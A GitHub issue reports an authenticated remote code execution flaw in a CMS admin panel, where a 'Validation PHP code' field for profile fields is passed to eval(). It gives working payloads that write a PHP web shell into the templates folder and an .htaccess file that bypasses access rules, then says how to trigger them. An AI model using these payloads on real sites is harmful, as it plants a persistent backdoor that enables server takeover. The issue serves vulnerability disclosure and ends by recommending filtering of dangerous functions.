There is a remote command execution vulnerability #888

Aview17 · 2021-11-03T02:21:06Z

Remote code execution vulnerabilities in the background

Affected version

login address

http://loacalhost/panel

Find Fields after login

On the right are the operations related to the column, choose one here, select Facebook

open Required field

Validation PHP code can enter any php code, here is a sentence of Trojan

exec('echo ^<?php eval($_GET["aa"]); ?^> >./templates/shell.php');

Then visit

http://loacalhost/profile/?edit

This code written will be triggered when the corresponding column is modified

But due to the .htaccess file under the root path, we cannot directly access the shell

we can write a .htaccess file in the same directory of the shell to bypass

In the same way, execute

exec('echo ^<IfModule mod_rewrite.c^> >./templates/.htaccess');exec('echo RewriteEngine Off  ^</IfModule^> >>./templates/.htaccess');

Then go to /profile/?edit to trigger it

At this time, you can access the shell and execute any command

The reason is that the code at the background Fields will be written to the database

Then when the information is modified, the data in it will be executed through eval()

The incoming Validation PHP code adds filtering for sensitive functions, such as exec(), system(), etc.

The text was updated successfully, but these errors were encountered: